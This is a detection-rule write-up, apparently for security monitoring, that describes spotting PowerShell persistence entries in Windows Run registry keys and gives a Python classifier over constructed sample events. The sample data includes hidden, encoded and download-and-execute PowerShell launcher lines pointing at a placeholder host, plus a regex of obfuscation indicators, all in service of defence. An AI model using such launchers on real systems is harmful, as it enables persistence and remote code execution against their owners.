
Summary
This detection rule identifies potentially malicious PowerShell commands or scripts stored in the Windows registry Run keys. These keys, specifically \Software\Microsoft\Windows\CurrentVersion\Run, are frequently used by threat actors to make a malicious payload persist by launching it at system startup (ATT&CK T1547.001). The rule's selection criteria screen registry values for attributes that indicate a PowerShell invocation, including common cmdlets and arguments that are often used in obfuscated or deceptive ways to avoid detection. Because legitimate administrative tasks may also write such values, the rule requires contextual analysis of each hit to reduce false positives. The detection helps maintain system integrity by surfacing unauthorized execution of potentially harmful scripts on startup.
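As an added illustration (not the rule's own logic or any vendor's code), the selection criteria described above applied to a few constructed Sysmon-style registry SetValue events; the key-path regex, the indicator list and the "review" tier for PowerShell without high-risk markers are assumptions made for this example:

```python
import re

# Constructed sample events in Sysmon Event ID 13 (RegistryEvent SetValue) style;
# not real telemetry from any system.
SAMPLE_EVENTS = [
    {"TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": "powershell.exe -nop -w hidden -enc AAAA"},   # AAAA: constructed blob stand-in
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background'},
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cleanup",
     "Details": "pwsh.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inventory",
     "Details": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# Scope: values written under the Run / RunOnce keys of any hive.
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
PS_BINARY_RE = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
# Arguments and cmdlets commonly seen in obfuscated or download-and-execute launchers
# (assumed indicator list for this example).
HIGH_RISK_RE = re.compile(
    r"(-e(nc|ncodedcommand)?\b|-nop\b|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression"
    r"|downloadstring|frombase64string|net\.webclient)", re.I)

def classify(event):
    """Return None if out of scope, else ('high' | 'review', sorted matched indicators)."""
    if not RUN_KEY_RE.search(event["TargetObject"]):
        return None
    details = event["Details"]
    if not PS_BINARY_RE.search(details):
        return None
    hits = sorted({m.group(0).lower() for m in HIGH_RISK_RE.finditer(details)})
    # PowerShell in a Run key without high-risk markers (e.g. an admin's -File script)
    # is flagged for contextual review rather than raised as a high-confidence alert.
    return ("high" if hits else "review", hits)

def scan(events):
    """Apply classify() to every event and keep only in-scope results."""
    results = []
    for e in events:
        verdict = classify(e)
        if verdict:
            results.append((e["TargetObject"], verdict[0], verdict[1]))
    return results

if __name__ == "__main__":
    for target, level, hits in scan(SAMPLE_EVENTS):
        print(f"{level:6} {target}  indicators={hits}")
```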
Categories
- Windows
- Endpoint
- On-Premise
Data Sources
- Windows Registry
ATT&CK Techniques
- T1547.001
Created: 2022-03-17